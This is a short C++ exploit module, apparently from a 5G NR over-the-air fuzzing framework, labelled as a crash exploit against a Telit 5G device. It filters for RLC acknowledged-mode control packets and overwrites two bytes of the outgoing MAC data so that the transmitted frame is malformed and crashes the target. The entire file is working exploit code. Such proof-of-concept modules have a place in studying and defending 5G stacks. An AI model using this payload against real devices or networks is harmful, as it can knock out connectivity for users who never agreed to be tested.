modules/exploits/5gnr_gnb/mac_sch_mac_rlc_crash.cpp

#include <ModulesInclude.hpp>

// Filters
wd_filter_t f1;

// Vars


const char *module_name()
{
    return "Telit";
}

// Setup
int setup(wd_modules_ctx_t *ctx)
{
    // Change required configuration for exploit
    ctx->config->fuzzing.global_timeout = false;
    ctx->config->fuzzing.enable_mutation = false;

    // Declare filters
    f1 = wd_filter("rlc-nr.am.dc == 0");
    // f1 = wd_filter("nas_5gs.mm.message_type == 0x54");

    return 0;
}

// TX
int tx_pre_dissection(uint8_t *pkt_buf, int pkt_length, wd_modules_ctx_t *ctx)
{
    // Register filters
    wd_register_filter(ctx->wd, f1);

    return 0;
}

int tx_post_dissection(uint8_t *pkt_buf, int pkt_length, wd_modules_ctx_t *ctx)
{
    if (wd_read_filter(ctx->wd, f1)) {
        wd_log_y("Malformed MAC data sent!");
        pkt_buf[60 - 48] = 0xB5;
        pkt_buf[61 - 48] = 0x02;

        // pkt_buf[60 - 48] = 0xFD;
        // pkt_buf[63 - 48] = 0x03;
        return 1;
    }

    return 0;
}